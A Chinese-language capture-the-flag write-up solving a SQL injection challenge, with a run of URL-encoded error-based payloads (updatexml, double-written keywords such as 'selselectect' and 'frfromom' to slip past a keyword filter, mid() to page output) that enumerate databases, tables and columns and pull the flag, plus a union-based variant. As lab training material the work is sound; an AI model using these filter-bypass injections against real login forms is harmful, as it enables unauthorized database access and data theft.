#做题方法#
进去之后做了简单的注入发现有错误回显,就进行注入发现过滤了sql语
后面进行了双写and
payload:
?username=admin%27%20aandnd%20updatexml(1,concat(0x7e,dAtabase(),0x7e,version()),1)%20--+&password=admi 
接下来又
?username=admin%27%20aandnd%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27geek%27)),1)%20--+&password=admi
Error!
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'infmation_schema.tables table_schema='geek')),1) -- ' and password='admi'' at line 1
过滤select和from和where这种关键性的sql语
p?username=admin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(table_name)%20frfromom%20information_schema.tables%20whwhereere%20table_schema=datAbase())),1)%20--+&password=admin
过滤了or加上多加个or
?username=admin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema=datAbase())),1)%20--+&password=admin
感觉不在这个库里面原因:做过之前题好像是在ctf库里的
于是重新爆库名
p?username=admin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata)),1)%20--+&password=admi
ok!可以但是只能显示部分!
于是:加mid
username=admin%27%20aandnd%20updatexml(1,concat(0x7e,mid((selselectect%20group_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata),30,31)),1)%20--+&password=admin
肯定是mid过滤了
?username=admin%27%20aandnd%20updatexml(1,concat(0x7e,mmidid((selselectect%20group_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata),30,31)),1)%20--+&password=admi
好了在ctf里
admin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema='ctf')),1)%20--+&password=admin
username=admin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_name=%27Flag%27)),1)%20--+&password=admin
还是flag于是
username=admin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(flag)%20frfromom%20ctf.Flag)),1)%20--+&password=admin
flag{146e0e64-3add-4fab-aa69-bb
username=admin%27%20aandnd%20updatexml(1,concat(0x7e,mmidid((selselectect%20group_concat(flag)%20frfromom%20ctf.Flag),30,31)),1)%20--+&password=admin
错误注入是出来32位回显的,我们使用的是30,31)所以把前面bb去掉组合在一起就行了
~bb34cf3e6b1b}
flag{146e0e64-3add-4fab-aa69-bb34cf3e6b1b}
最后我试了一下union也可以出来,也是双写
username=1%27%20ununionion%20selselectect%201,2,group_concat(flag)%20frfromom%20ctf.Flag%20--+&password=admin
)
)
